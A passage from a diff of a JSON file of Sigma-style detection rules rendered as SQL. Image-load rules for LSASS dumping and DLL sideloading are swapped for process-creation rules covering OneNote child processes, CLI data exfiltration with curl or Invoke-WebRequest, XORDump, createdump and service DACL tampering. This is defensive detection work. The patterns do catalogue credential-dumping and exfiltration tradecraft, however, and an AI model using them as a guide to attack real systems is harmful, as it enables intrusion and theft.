Process", - "id": "0e277796-5f23-4e49-a490-483131d4f6e1", + "title": "Explorer Process Tree Break", + "id": "949f1ffb-6e85-4f00-ae1e-c3c5b190d605", "status": "test", - "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecraft use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", - "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "description": "Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,\nwhich is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from \"svchost\"\n", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dnx.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE 'C:\\\\WINDOWS\\\\winsxs\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\TiWorker.exe -Embedding' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}%' ESCAPE '\\' OR (CommandLine LIKE '%explorer.exe%' ESCAPE '\\' AND CommandLine LIKE '% /root,%' ESCAPE '\\')))" ], - "filename": "image_load_dll_dbghelp_dbgcore_susp_load.yml" + "filename": "proc_creation_win_explorer_break_process_tree.yml" }, { - "title": "DotNET DLL Loaded Via Office Applications", - "id": "ff0f2b05-09db-4095-b96d-1b75ca24894a", - "status": "test", - "description": "Detects any assembly DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Suspicious Microsoft OneNote Child Process", + "id": "c27515df-97a9-4162-8a60-dc0eeb51b775", + "status": "experimental", + "description": "Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.", + "author": "Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.t1566", + "attack.t1566.001", + "attack.initial_access" ], "falsepositives": [ - "Legitimate macro usage. 
Add the appropriate filter according to your environment" + "File located in the AppData folder with trusted signature" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\assembly\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' AND ((OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\javaw.exe' 
ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msidb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND (CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.wsh%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.pif%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\FileCoAuth.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding' ESCAPE '\\')))" ], - "filename": "image_load_office_dotnet_assembly_dll_load.yml" + "filename": "proc_creation_win_office_onenote_susp_child_processes.yml" }, { - "title": "Suspicious Renamed Comsvcs DLL Loaded By Rundll32", - "id": "8cde342c-ba48-4b74-b615-172c330f2e93", + "title": "Suspicious Execution of Shutdown to Log Out", + "id": "ec290c06-9b6b-4338-8b6b-095c0f284f10", "status": "experimental", - "description": "Detects rundll32 loading a renamed comsvcs.dll to dump process memory", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the rare use of the command line tool shutdown to logoff a user", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.defense_evasion", - "attack.t1003.001" + "attack.impact", + "attack.t1529" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (Hashes LIKE '%IMPHASH=eed93054cb555f3de70eaa9787f32ebb%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5e0dbdec1fce52daae251a110b4f309d%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=eadbccbb324829acb5f2bbe87e5549a8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=407ca0f7b523319d758a40d7c0193699%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=281d618f4e6271e527e6386ea6f748de%' ESCAPE '\\')) AND NOT (ImageLoaded LIKE '%\\\\comsvcs.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND 
Channel = 'Security' AND NewProcessName LIKE '%\\\\shutdown.exe' ESCAPE '\\' AND CommandLine LIKE '%/l%' ESCAPE '\\')" ], - "filename": "image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml" + "filename": "proc_creation_win_shutdown_logoff.yml" }, { - "title": "Unsigned Image Loaded Into LSASS Process", - "id": "857c8db3-c89b-42fb-882b-f681c7cf4da2", + "title": "Deny Service Access Using Security Descriptor Tampering Via Sc.EXE", + "id": "99cf1e02-00fb-4c0d-8375-563f978dfd37", "status": "test", - "description": "Loading unsigned image (DLL, EXE) into LSASS process", - "author": "Teymur Kheirkhabarov, oscd.community", + "description": "Detects suspicious DACL modifications to deny access to a service that affects critical trustees. This can be used to hide services or make them unstoppable.", + "author": "Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ - "Valid user connecting using RDP" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' AND Signed = 'false')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%D;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" ], - "filename": "image_load_unsigned_image_loaded_into_lsass.yml" + "filename": "proc_creation_win_sc_sdset_deny_service_access.yml" }, { - "title": "Python Py2Exe Image Load", - "id": "cbb56d62-4060-40f7-9466-d8aaf3123f83", + "title": "Suspicious Vsls-Agent Command With AgentExtensionPath Load", + "id": "43103702-5886-11ed-9b6a-0242ac120002", "status": 
"experimental", - "description": "Detects the image load of Python Core indicative of a Python script bundled with Py2Exe.", - "author": "Patrick St. John, OTR (Open Threat Research)", + "description": "Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter", + "author": "bohops", "tags": [ "attack.defense_evasion", - "attack.t1027.002" + "attack.t1218" ], "falsepositives": [ - "Legitimate Py2Exe Binaries", - "Known false positive caused with Python Anaconda" + "False positives depend on custom use of vsls-agent.exe" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Description = 'Python Core' AND NOT ((NewProcessName LIKE '%Python%' ESCAPE '\\' OR (NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\%' ESCAPE '\\')) OR (NewProcessName = '')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\vsls-agent.exe' ESCAPE '\\' AND CommandLine LIKE '%--agentExtensionPath%' ESCAPE '\\') AND NOT (CommandLine LIKE '%Microsoft.VisualStudio.LiveShare.Agent.%' ESCAPE '\\'))" ], - "filename": "image_load_susp_python_image_load.yml" + "filename": "proc_creation_win_vslsagent_agentextensionpath_load.yml" }, { - "title": "FoggyWeb Backdoor DLL Loading", - "id": "640dc51c-7713-4faa-8a0e-e7c0d9d4654c", - "status": "test", - "description": "Detects DLL hijacking technique used by NOBELIUM in their FoggyWeb backdoor. 
Which loads a malicious version of the expected \"version.dll\" dll", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Data Exfiltration Activity Via CommandLine Tools", + "id": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", + "status": "experimental", + "description": "Detects the use of various CLI utilities exfiltrating data via web requests", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ImageLoaded LIKE 'C:\\\\Windows\\\\ADFS\\\\version.dll' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND CommandLine LIKE '% -ur%' ESCAPE '\\' AND CommandLine LIKE '% -me%' ESCAPE '\\' AND CommandLine LIKE '% -b%' ESCAPE '\\' AND CommandLine LIKE '% POST %' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--ur%' ESCAPE '\\' AND (CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\'))) AND ((CommandLine LIKE '%ToBase64String%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%nltest%' ESCAPE '\\' OR CommandLine LIKE '%ifconfig%' ESCAPE '\\' OR CommandLine LIKE '%hostname%' ESCAPE '\\' OR CommandLine LIKE '%net view%' ESCAPE '\\' OR CommandLine LIKE '%qprocess%' ESCAPE '\\' OR CommandLine LIKE '%netstat%' ESCAPE '\\' OR CommandLine LIKE '%systeminfo%' ESCAPE '\\' OR CommandLine LIKE '%tasklist%' ESCAPE '\\' OR CommandLine LIKE '%sc query%' ESCAPE '\\') OR (CommandLine 
LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\%' ESCAPE '\\')))" ], - "filename": "image_load_malware_foggyweb_nobelium.yml" + "filename": "proc_creation_win_susp_data_exfiltration_via_cli.yml" }, { - "title": "Alternate PowerShell Hosts - Image", - "id": "fe6e002f-f244-4278-9263-20e4b593827f", + "title": "Suspicious IIS URL GlobalRules Rewrite Via AppCmd", + "id": "7c8af9b2-dcae-41a2-a9db-b28c288b5f08", "status": "experimental", - "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects usage of \"appcmd\" to create new global URL rewrite rules. This behaviour has been observed being used by threat actors to add new rules so they can access their webshells.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate usage of appcmd to add new URL rewrite rules" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((Description = 'System.Management.Automation' AND ImageLoaded LIKE '%System.Management.Automation%' ESCAPE '\\') AND NOT (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mscorsvw.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\Citrix\\\\ConfigSync\\\\%' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (NewProcessName = '')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\appcmd.exe' 
ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND (CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%section:system.webServer/rewrite/globalRules%' ESCAPE '\\' AND CommandLine LIKE '%commit:%' ESCAPE '\\'))" ], - "filename": "image_load_alternate_powershell_hosts_moduleload.yml" + "filename": "proc_creation_win_iis_appcmd_susp_rewrite_rule.yml" }, { - "title": "Microsoft Defender Loading DLL from Nondefault Path", - "id": "418dc89a-9808-4b87-b1d7-e5ae0cb6effc", + "title": "REGISTER_APP.VBS Proxy Execution", + "id": "1c8774a0-44d4-4db0-91f8-e792359c70bd", "status": "experimental", - "description": "Detects loading of Microsoft Defender's DLLs by its processes (MpCmdRun and NisSrv) from the non-default directory which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "description": "Detects the use of a Microsoft signed script 'REGISTER_APP.VBS' to register a VSS/VDS Provider as a COM+ application.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1218" ], "falsepositives": [ - "Very unlikely" + "Legitimate usage of the script. 
Always investigate what's being registered to confirm if it's benign" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (((NewProcessName LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\NisSrv.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\mpclient.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\register\\_app.vbs%' ESCAPE '\\' AND CommandLine LIKE '%-register%' ESCAPE '\\')" ], - "filename": "image_load_side_load_windows_defender.yml" + "filename": "proc_creation_win_lolbin_register_app.yml" }, { - "title": "Time Travel Debugging Utility Usage - Image", - "id": "e76c8240-d68f-4773-8880-5c6f63595aaf", - "status": "test", - "description": "Detects usage of Time Travel Debugging Utility. 
Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "title": "DeviceCredentialDeployment Execution", + "id": "b8b1b304-a60f-4999-9a6e-c547bde03ffd", + "status": "experimental", + "description": "Detects the execution of DeviceCredentialDeployment to hide a process from view", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", - "attack.t1003.001" + "attack.t1218" ], "falsepositives": [ - "Legitimate usage by software developers/testers" + "Unlikely" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdwriter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdloader.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\DeviceCredentialDeployment.exe' ESCAPE '\\')" ], - "filename": "image_load_tttracer_mod_load.yml" + "filename": "proc_creation_win_lolbin_device_credential_deployment.yml" }, { - "title": "Active Directory Kerberos DLL Loaded Via Office Applications", - "id": "7417e29e-c2e7-4cf6-a2e8-767228c64837", + "title": "Renamed Whoami Execution", + "id": "f1086bf7-a0c4-4a37-9102-01e573caf4a0", "status": "test", - "description": "Detects Kerberos DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "description": "Detects the execution of whoami that has been renamed to a different name to avoid detection", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Legitimate macro usage. 
Add the appropriate filter according to your environment" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mspub.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenote.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\kerberos.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName = 'whoami.exe' AND NOT (NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\'))" ], - "filename": "image_load_office_kerberos_dll_load.yml" + "filename": "proc_creation_win_renamed_whoami.yml" }, { - "title": "Web Browsers DLL Sideloading", - "id": "72ca7c75-bf85-45cd-aca7-255d360e423c", + "title": "CreateDump Process Dump", + "id": "515c8be5-e5df-4c5e-8f6d-a4a2f05e4b48", "status": "experimental", - "description": "Detects DLL sideloading of DLLs that are part of web browsers", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "Detects uses of the createdump.exe LOLOBIN utility to dump process memory", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Command lines that use the same flags" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\chrome\\_frame\\_helper.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE '%\\\\AppData\\\\local\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR (ImageLoaded LIKE 'C:\\\\Program 
Files\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\createdump.exe' ESCAPE '\\' OR OriginalFileName LIKE 'FX\\_VER\\_INTERNALNAME\\_STR' ESCAPE '\\') AND (CommandLine LIKE '% -u %' ESCAPE '\\' OR CommandLine LIKE '% --full %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% --name %' ESCAPE '\\' OR CommandLine LIKE '%.dmp %' ESCAPE '\\'))" ], - "filename": "image_load_side_load_web_browsers.yml" + "filename": "proc_creation_win_createdump_lolbin_execution.yml" }, { - "title": "DLL Sideloading Of DBGCORE.DLL", - "id": "9ca2bf31-0570-44d8-a543-534c47c33ed7", - "status": "experimental", - "description": "Detects DLL sideloading of \"dbgcore.dll\"", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "title": "HackTool - XORDump Execution", + "id": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", + "status": "test", + "description": "Detects suspicious use of XORDump process memory dumping utility", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate applications loading their own versions of the DLL mentioned in this rule" + "Another tool that uses the command line switches of XORdump" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 
'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\xordump.exe' ESCAPE '\\' OR (CommandLine LIKE '% -process lsass.exe %' ESCAPE '\\' OR CommandLine LIKE '% -m comsvcs %' ESCAPE '\\' OR CommandLine LIKE '% -m dbghelp %' ESCAPE '\\' OR CommandLine LIKE '% -m dbgcore %' ESCAPE '\\')))" ], - "filename": "image_load_side_load_dbgcore_dll.yml" + "filename": "proc_creation_win_hktl_xordump.yml" }, { - "title": "Active Directory Parsing DLL Loaded Via Office Applications", - "id": "a2a3b925-7bb0-433b-b508-db9003263cc4", - "status": "test", - "description": "Detects DSParse DLL being loaded by an Office Product", - "author": "Antonlovesdnb", + "title": "Service Reconnaissance Via Wmic.EXE", + "id": "76f55eaa-d27f-4213-9d45-7b0e4b60bbae", + "status": "experimental", + "description": "An adversary might use WMI to check if a certain remote service is running on a remote device.\nWhen the test completes, a service information will be displayed on the screen if it exists.\nA common feedback message is that \"No instance(s) Available\" if the service queried is not running.\nA common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" if the provided remote host is unreachable\n", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1204.002" + "attack.t1047" + ], + "falsepositives": [ + "Unknown" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%service%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_wmic_recon_service.yml" + }, + { + "title": "Indirect Command Execution By 
